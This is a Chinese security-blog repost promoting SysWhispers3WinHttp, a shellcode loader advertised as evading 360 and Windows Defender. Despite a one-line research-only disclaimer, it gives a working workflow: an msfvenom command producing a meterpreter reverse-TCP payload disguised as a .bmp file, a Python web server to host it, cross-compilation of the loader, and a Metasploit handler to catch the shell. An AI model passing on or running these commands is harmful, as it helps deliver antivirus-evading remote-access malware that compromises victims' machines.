干货 | 免杀绕过360核晶防护与Defender,附代码
2023-4-18 14:19:4 Author: HACK学习君(查看原文) 阅读量:167 收藏

SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译,文件大小14KB,可免杀绕过360核晶防护与Defender。

0x01 免责声明:

该项目仅供安全研究使用,禁止使用该项目进行违法操作,否则由使用者承担全部法律及连带责任。

0x02 使用:

// 1. 使用msfvenom生成shellcode(或使用CobaltStrike生成Stageless之Shellcode)msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o test.bmp
// 2. 使用python3开启Web服务(或使用CobaltStrike之HostFile功能)python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c 第40行IP地址并使用32位GCC交叉编译i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -fpermissive -w -s -lwinhttp

注:Windows下32位GCC下载地址为

https://master.dl.sourceforge.net/project/mingw-w64/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/6.4.0/threads-win32/sjlj/i686-6.4.0-release-win32-sjlj-rt_v5-rev0.7z?viasf=1

0x03 演示:

msfconsolemsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 4444msf6 exploit(multi/handler) > run

360核晶截图

Defender截图

微步云沙箱截图

项目地址:

https://github.com/huaigu4ng/SysWhispers3WinHttp

记得Follow和Star哦!

参考来源

https://github.com/klezVirus/SysWhispers3https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect


推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

其他更多精彩内容,欢迎加入我们的星球


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzNzMxMDkxNw==&mid=2247492662&idx=1&sn=4be4aad46f0efa383396acc6a1837c9d&chksm=e8c8229cdfbfab8a1c2c25b30ac19cce051aca3069672d528ca9cddfce142f7aa8150d35ddda#rd
如有侵权请联系:admin#unsafe.sh